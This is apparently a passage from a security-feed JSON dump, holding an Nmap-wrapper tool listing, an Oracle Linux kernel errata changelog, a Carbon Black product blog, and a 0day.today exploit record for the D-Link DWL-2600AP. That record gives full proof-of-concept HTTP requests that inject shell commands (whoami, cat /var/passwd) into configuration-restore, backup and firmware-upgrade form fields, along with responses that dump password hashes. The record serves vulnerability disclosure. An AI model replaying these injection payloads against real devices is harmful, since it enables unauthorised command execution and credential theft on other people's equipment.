##############################################\n ### NMAP SETTING ###\n ##############################################\n \n # PE (echo req), PP (timestamp-request)\n # you can add a port on every ping scan\n NMAP_PING='-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445'\n \n NMAP_OTHER='-sV --allports -O --fuzzy --min-hostgroup 256'\n \n SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)'\n \n SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)'\n \n SCRIPT_ARGS=\"userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST\"\n \n CUSTOM_SCAN='--max-retries 3 --min-rate 250' # LIKE UNICORNSCAN\n\n \n** Twin Brother ** \nThis project is very similar to [ Kaboom ](<https://github.com/Leviathan36/kaboom> \"Kaboom\" ) , but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the ** portability ** and the ** efficient ** , but it's recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools ( _ redundancy _ and _ reliability _ ). \n \n \n\n\n** [ Download Trigmap ](<https://github.com/Leviathan36/trigmap> \"Download Trigmap\" ) **\n", "modified": "2019-05-15T12:54:06", "published": "2019-05-15T12:54:06", "id": "KITPLOIT:1999394669999310342", "href": "http://www.kitploit.com/2019/05/trigmap-wrapper-for-nmap-to-automate.html", "title": "Trigmap - A Wrapper For Nmap To Automate The Pentest", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}], "oraclelinux": [{"lastseen": "2019-05-16T02:23:27", "bulletinFamily": "unix", "description": "[4.1.12-124.27.1]\n- scsi: libfc: sanitize E_D_TOV and R_A_TOV setting (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: use configured rport E_D_TOV (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: additional debugging messages (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: don't advance state machine for incoming FLOGI (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not login if the port is already started (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not drop down to FLOGI for fc_rport_login() (Hannes Reinecke) [Orabug: 25933179] \n- scsi: libfc: Do not take rdata->rp_mutex when processing a -FC_EX_CLOSED ELS response. (Chad Dupuis) [Orabug: 25933179] \n- scsi: libfc: Fixup disc_mutex handling (Hannes Reinecke) [Orabug: 25933179] \n- xve: arm ud tx cq to generate completion interrupts (Ajaykumar Hotchandani) [Orabug: 28267050] \n- net: sched: run ingress qdisc without locks (Alexei Starovoitov) [Orabug: 29395374] \n- bnxt_en: Fix typo in firmware message timeout logic. (Michael Chan) [Orabug: 29412112] \n- bnxt_en: Wait longer for the firmware message response to complete. (Michael Chan) [Orabug: 29412112] \n- mm,vmscan: Make unregister_shrinker() no-op if register_shrinker() failed. (Tetsuo Handa) [Orabug: 29456281] \n- X.509: Handle midnight alternative notation in GeneralizedTime (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Support leap seconds (David Howells) [Orabug: 29460344] {CVE-2015-5327}\n- X.509: Fix the time validation [ver #2] (David Howells) [Orabug: 29460344] {CVE-2015-5327} {CVE-2015-5327}\n- be2net: enable new Kconfig items in kernel configs (Brian Maly) [Orabug: 29475071] \n- benet: remove broken and unused macro (Lubomir Rintel) [Orabug: 29475071] \n- be2net: don't flip hw_features when VXLANs are added/deleted (Davide Caratti) [Orabug: 29475071] \n- be2net: Fix memory leak in be_cmd_get_profile_config() (Petr Oros) [Orabug: 29475071] \n- be2net: Use Kconfig flag to support for enabling/disabling adapters (Petr Oros) [Orabug: 29475071] \n- be2net: Mark expected switch fall-through (Gustavo A. R. Silva) [Orabug: 29475071] \n- be2net: fix spelling mistake 'seqence' -> 'sequence' (Colin Ian King) [Orabug: 29475071] \n- be2net: Update the driver version to 12.0.0.0 (Suresh Reddy) [Orabug: 29475071] \n- be2net: gather debug info and reset adapter (only for Lancer) on a tx-timeout (Suresh Reddy) [Orabug: 29475071] \n- be2net: move rss_flags field in rss_info to ensure proper alignment (Ivan Vecera) [Orabug: 29475071] \n- be2net: re-order fields in be_error_recovert to avoid hole (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused tx_jiffies field from be_tx_stats (Ivan Vecera) [Orabug: 29475071] \n- be2net: move txcp field in be_tx_obj to eliminate holes in the struct (Ivan Vecera) [Orabug: 29475071] \n- be2net: reorder fields in be_eq_obj structure (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old custom busy-poll fields (Ivan Vecera) [Orabug: 29475071] \n- be2net: remove unused old AIC info (Ivan Vecera) [Orabug: 29475071] \n- be2net: Fix error detection logic for BE3 (Suresh Reddy) [Orabug: 29475071] \n- scsi: sd: Do not override max_sectors_kb sysfs setting (Martin K. Petersen) [Orabug: 29596510] \n- USB: serial: io_ti: fix div-by-zero in set_termios (Johan Hovold) [Orabug: 29487834] {CVE-2017-18360}\n- bnxt_en: Drop oversize TX packets to prevent errors. (Michael Chan) [Orabug: 29516462] \n- x86/speculation: Read per-cpu value of x86_spec_ctrl_priv in x86_virt_spec_ctrl() (Alejandro Jimenez) [Orabug: 29526401] \n- x86/speculation: Keep enhanced IBRS on when prctl is used for SSBD control (Alejandro Jimenez) [Orabug: 29526401] \n- USB: hso: Fix OOB memory access in hso_probe/hso_get_config_data (Hui Peng) [Orabug: 29605982] {CVE-2018-19985} {CVE-2018-19985}\n- swiotlb: save io_tlb_used to local variable before leaving critical section (Dongli Zhang) [Orabug: 29637525] \n- swiotlb: dump used and total slots when swiotlb buffer is full (Dongli Zhang) [Orabug: 29637525] \n- x86/bugs, kvm: don't miss SSBD when IBRS is in use. (Quentin Casasnovas) [Orabug: 29642113] \n- cifs: Fix use after free of a mid_q_entry (Shuning Zhang) [Orabug: 29654888] \n- binfmt_elf: switch to new creds when switching to new mm (Linus Torvalds) [Orabug: 29677233] {CVE-2019-11190}\n- x86/microcode: Don't return error if microcode update is not needed (Boris Ostrovsky) [Orabug: 29759756]", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "ELSA-2019-4642", "href": "http://linux.oracle.com/errata/ELSA-2019-4642.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2019-05-15T13:56:19", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "1337DAY-ID-32684", "href": "https://0day.today/exploit/description/32684", "title": "DLink DWL-2600AP - Multiple OS Command Injection Vulnerability", "type": "zdt", "sourceData": "Document Title:\r\n===============\r\nD-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThe D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.\r\n\r\nAffected Product(s):\r\n====================\r\nProduct: D-Link DWL-2600AP (Web Interface)\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHIGH\r\n\r\nBase Score (CVSS):\r\n===============\r\n7.8\r\n\r\n===============\r\nRequest Method(s):\r\n[+] POST\r\n\r\nURL Path :\r\n[+] /admin.cgi?action=config_restore\r\n\r\nVulnerable POST Form Data Parameter:\r\n[+] configRestore\r\n[+] configServerip\r\n===========================\r\nDevice Firmware version :\r\n[+] 4.2.0.15\r\n\r\nHardware Version :\r\n[+] A1\r\n\r\nDevice name :\r\n[+] D-Link AP\r\n\r\nProduct Identifier : \r\n[+] WLAN-EAP\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by local authenticated attackers.\r\nthere is no input validation on the POST Form Data Parameter \"configRestore\"\r\nand the Form Data Parameter \"configServerip\" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.\r\nThe attacker has to know the credentials in order to access the Panel .\r\nFor security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .\r\n\r\n\r\n--- PoC Session Logs ---\r\nPOST /admin.cgi?action=config_restore HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\nContent-Length: 357\r\nCache-Control: max-age=0\r\nOrigin: http://localhost\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: multipart/form-data; \r\nUser-Agent: Xxxxxxxx\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nReferer: http://localhost/admin.cgi?action=config_restore\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4\r\nCookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E\r\n\r\n------WebKitFormBoundary4ZAwHsdySFjwNXxE\r\nContent-Disposition: form-data; name=\"optprotocol\"\r\n\r\nup\r\n------WebKitFormBoundary4ZAwHsdySFjwNXxE\r\nContent-Disposition: form-data; name=\"configRestore\"\r\n\r\n;whoami;\r\n------WebKitFormBoundary4ZAwHsdySFjwNXxE\r\nContent-Disposition: form-data; name=\"configServerip\"\r\n\r\n;cat /var/passwd;cat /var/passwd\r\n------WebKitFormBoundary4ZAwHsdySFjwNXxE--\r\n\r\n\r\n----------->Response----------->\r\n\r\nHTTP/1.0 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n/usr/bin/tftp: option requires an argument -- r\r\nBusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.\r\n\r\nUsage: tftp [OPTIONS] HOST [PORT]\r\n\r\nTransfer a file from/to tftp server\r\n\r\nOptions:\r\n\t-l FILE\tLocal FILE\r\n\t-r FILE\tRemote FILE\r\n\t-g\tGet file\r\n\t-p\tPut file\r\n\t-b SIZE\tTransfer blocks of SIZE octets\r\n\r\nsh: whoami: not found\r\nsh: whoami: not found\r\nroot:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh\r\nadmin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash\r\nnobody:x:99:99:nobody:/:/bin/false\r\n\r\nNote : for testing put the values in the fields like this : \r\n;command1;same_command1;command2;command2\r\n\r\n\r\n----+Discovered By Raki Ben Hamouda----+\r\n\r\n\r\nDocument Title:\r\n===============\r\nD-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThe D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.\r\n\r\nAffected Product(s):\r\n====================\r\nProduct: D-Link DWL-2600AP (Web Interface)\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHIGH\r\n\r\nBase Score (CVSS):\r\n===============\r\n7.8\r\n\r\n===============\r\nRequest Method(s):\r\n[+] POST\r\n\r\nURL Path :\r\n[+] /admin.cgi?action=config_save\r\n\r\nVulnerable POST Form Data Parameter:\r\n[+] configBackup\r\n[+] downloadServerip\r\n==========================\r\nDevice Firmware version :\r\n[+] 4.2.0.15\r\n\r\nHardware Version :\r\n[+] A1\r\n\r\nDevice name :\r\n[+] D-Link AP\r\n\r\nProduct Identifier : \r\n[+] WLAN-EAP\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by remote or local authenticated attackers.\r\nthere is no input validation on the POST Form Data Parameter \"configBackup\"\r\nand the Form Data Parameter \"downloadServerip\" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.\r\nThe attacker has to know the credentials in order to access the Panel .\r\nFor security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .\r\n\r\n--- PoC Session Logs ---\r\nPOST /admin.cgi?action=config_save HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\nContent-Length: 114\r\nCache-Control: max-age=0\r\nOrigin: http://localhost\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Xxxxxxxx\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nReferer: http://localhost/admin.cgi?action=config_save\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4\r\nCookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E\r\n\r\ncheck_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd\r\n\r\n\r\n----------->Response----------->\r\n\r\nHTTP/1.0 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n/usr/bin/tftp: option requires an argument -- r\r\nBusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.\r\n\r\nUsage: tftp [OPTIONS] HOST [PORT]\r\n\r\nTransfer a file from/to tftp server\r\n\r\nOptions:\r\n\t-l FILE\tLocal FILE\r\n\t-r FILE\tRemote FILE\r\n\t-g\tGet file\r\n\t-p\tPut file\r\n\t-b SIZE\tTransfer blocks of SIZE octets\r\n\r\nsh: whoami: not found\r\nsh: whoami: not found\r\nsh: .xml: not found\r\nroot:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh\r\nadmin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash\r\nnobody:x:99:99:nobody:/:/bin/false\r\n\r\nNote : for testing put the values in the fields like this : \r\n;command1;same_command1;command2;etc...\r\n\r\n\r\n----+Discovered By Raki Ben Hamouda----+\r\n\r\n\r\nDocument Title:\r\n===============\r\nD-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nThe D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.\r\n\r\nAffected Product(s):\r\n====================\r\nProduct: D-Link DWL-2600AP (Web Interface)\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nLocal\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHIGH\r\n\r\nBase Score (CVSS):\r\n===============\r\n7.8\r\n\r\n===============\r\nRequest Method(s):\r\n[+] POST\r\n\r\nURL Path :\r\n[+] /admin.cgi?action=upgrade\r\n\r\nVulnerable POST Form Data Parameter:\r\n[+] firmwareRestore\r\n[+] firmwareServerip\r\n\r\n===========================\r\nDevice Firmware version :\r\n[+] 4.2.0.15\r\n\r\nHardware Version :\r\n[+] A1\r\n\r\nDevice name :\r\n[+] D-Link AP\r\n\r\nProduct Identifier : \r\n[+] WLAN-EAP\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by local authenticated attackers.\r\nthere is no input validation on the POST Form Data Parameter \"firmwareRestore\"\r\nand the Form Data Parameter \"firmwareServerip\" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.\r\nThe attacker has to know the credentials in order to access the Panel .\r\nFor security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .\r\n\r\n--- PoC Session Logs ---\r\n\r\nPOST /admin.cgi?action=upgrade HTTP/1.1\r\nHost: localhost\r\nConnection: keep-alive\r\nContent-Length: 525\r\nCache-Control: max-age=0\r\nOrigin: http://localhost\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: multipart/form-data;\r\nUser-Agent: xxxxxxxxw\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nReferer: http://localhost/admin.cgi?action=upgrade\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4\r\nCookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E\r\n\r\n------WebKitFormBoundaryBy0MsFaBOhdU6YJL\r\nContent-Disposition: form-data; name=\"optprotocol\"\r\n\r\nup\r\n------WebKitFormBoundaryBy0MsFaBOhdU6YJL\r\nContent-Disposition: form-data; name=\"firmwareRestore\"\r\n\r\n;whoami;whoami\r\n------WebKitFormBoundaryBy0MsFaBOhdU6YJL\r\nContent-Disposition: form-data; name=\"firmwareServerip\"\r\n\r\n;cat /var/passwd;cat /var/passwd\r\n------WebKitFormBoundaryBy0MsFaBOhdU6YJL\r\nContent-Disposition: form-data; name=\"update.device.packet-capture.stop-capture\"\r\n\r\nup\r\n------WebKitFormBoundaryBy0MsFaBOhdU6YJL--\r\n\r\n----------->Response----------->\r\n\r\nHTTP/1.0 200 OK\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n/usr/bin/tftp: option requires an argument -- r\r\nBusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.\r\n\r\nUsage: tftp [OPTIONS] HOST [PORT]\r\n\r\nTransfer a file from/to tftp server\r\n\r\nOptions:\r\n\t-l FILE\tLocal FILE\r\n\t-r FILE\tRemote FILE\r\n\t-g\tGet file\r\n\t-p\tPut file\r\n\t-b SIZE\tTransfer blocks of SIZE octets\r\n\r\nsh: whoami: not found\r\nsh: whoami: not found\r\nroot:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh\r\nadmin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash\r\nnobody:x:99:99:nobody:/:/bin/false\r\n\r\nNote : for testing put the values in the fields like this : \r\n;command1;same_command1;command2;etc...\r\n----+Discovered By Raki Ben Hamouda----+\n\n# 0day.today [2019-05-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32684"}], "carbonblack": [{"lastseen": "2019-05-14T22:27:14", "bulletinFamily": "blog", "description": "Security & IT teams often have no reliable way to check on the current status of their endpoints across their enterprise. This forces these teams to piece together information from multiple management consoles in order to get answers about the health of their entire fleet. Even when they do have access to a [real-time endpoint query tool](<https://www.carbonblack.com/resource/endpoint-security-must-include-rapid-query-remediation-capabilities/>), it can be difficult for administrators to know what types of data they can actually get from those solutions, leading to an inability to make informed remediation decisions and unnecessary spending on infrastructure maintenance.\n\nUnlike [endpoint detection & response](<https://www.carbonblack.com/resource/endpoint-detection-response/>) (EDR) solutions, which collect and store historical endpoint activity, CB LiveOps is an endpoint query & remediation solution that makes it quick and easy for teams to reach out directly to their endpoints and pull back data about the current status of those devices. Along with helping teams speed up incident response investigations, [CB LiveOps](<https://www.carbonblack.com/products/cb-liveops/>) also makes it easy for security & IT teams to proactively gather data to confirm patch levels, inventory software licenses, check for unwanted browser extensions, prove compliance, and more.\n\nThe latest release of CB LiveOps provides users with an in-product catalog of recommended queries, giving them powerful pre-built queries that help shine a light on potential gaps that exist in their environment. Read on to find out all about the new functionality included in the April 2019 release of CB LiveOps.\n\n \n\n### Recommended Queries Catalog\n\n\n\nUsers now have the ability to access and run recommended queries, making it easy for them to leverage the security expertise of [Carbon Black\u2019s Threat Analysis Unit ](<https://www.carbonblack.com/why-cb/threat-analysis-unit/>)(TAU) team. This query catalog includes completely pre-built live queries for both Windows and macOS devices.\n\nThe query builder in CB LiveOps has always made it easy for users who aren\u2019t familiar with the SQL language to quickly build out and ship queries. This new feature takes that approach a step further by making it effortless for security & IT teams to get valuable insights about the current status of all the endpoints in their environment.\n\nThe queries included in this dynamic in-product catalog are tested by experts and categorized into four groups:\n\n * Compliance\n * IT Hygiene\n * Threat Hunting\n * Vulnerability Management\n\n \n\nEach recommended query also includes a brief summary that explains the value of the query or describes what expected results will look like. As new threat research emerges, the TAU team can immediately populate newly developed queries in the product, allowing users to quickly eliminate vulnerability against new threats.\n\n \n\n### **Device View**\n\n\n\nThe new Device View makes it easier for users to see the results of a query from a device-centric perspective. This view is particularly helpful for queries that return multiple results from each device being queried.\n\nThis new view gives users useful information about the status of their query, including which devices have already responded, which devices matched the query criteria, metrics on memory and CPU usage for each device, and the response time for each device. For devices that have multiple results, users can click the number in the Results column to see details about all results from that specific endpoint.\n\nUsers can easily pivot back and forth from the Results view to the Device view in order to find the specific details that are most important at any given time.\n\n \n\n### **Simplified Results Management**\n\n\n\nUsers can now search the query history to easily find results from queries run in the past. Along with searching from the Query History section to search back through all stored query results, users can also click into a specific query and search through the results of that individual query.\n\nUsers can now also choose to delete past query results that are no longer needed in the console. This helps to eliminate any clutter and reduces concerns about sensitive query results being accessible longer than needed.\n\nWant to learn more about how you can extend your team\u2019s visibility into the current status of all your endpoints? [Click here to view an on-demand demo of CB LiveOps](<https://www.carbonblack.com/resource/cb-defense-live-demo-introducing-cb-liveops/>).\n\n \n\n### **See Also:**\n\n * [8 Live Queries That Will Speed Up Your Next PCI Audit](<https://www.carbonblack.com/2019/05/08/8-live-queries-that-will-speed-up-your-next-pci-audit/>)\n * [How CB LiveOps Helps with Vulnerability Assessment](<https://www.carbonblack.com/2019/01/22/how-cb-liveops-helps-with-vulnerability-assessment/>)\n * [Threat Research Data Illustrates What\u2019s Coming in 2019](<https://www.carbonblack.com/2019/04/08/can-you-handle-cyber-threats-in-2019/>)\n\nThe post [New CB LiveOps Release Brings Recommended Queries to Users](<https://www.carbonblack.com/2019/05/14/new-cb-liveops-release-brings-recommended-queries-to-users/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "modified": "2019-05-14T21:32:02", "published": "2019-05-14T21:32:02", "id": "CARBONBLACK:F1B75E1E1D425FC5A5656F9663DE8FC2", "href": "https://www.carbonblack.com/2019/05/14/new-cb-liveops-release-brings-recommended-queries-to-users/", "type": "carbonblack", "title": "New CB LiveOps Release Brings Recommended Queries to Users", "cvss": {"score": 0.0, "vector": "NONE"}}]}
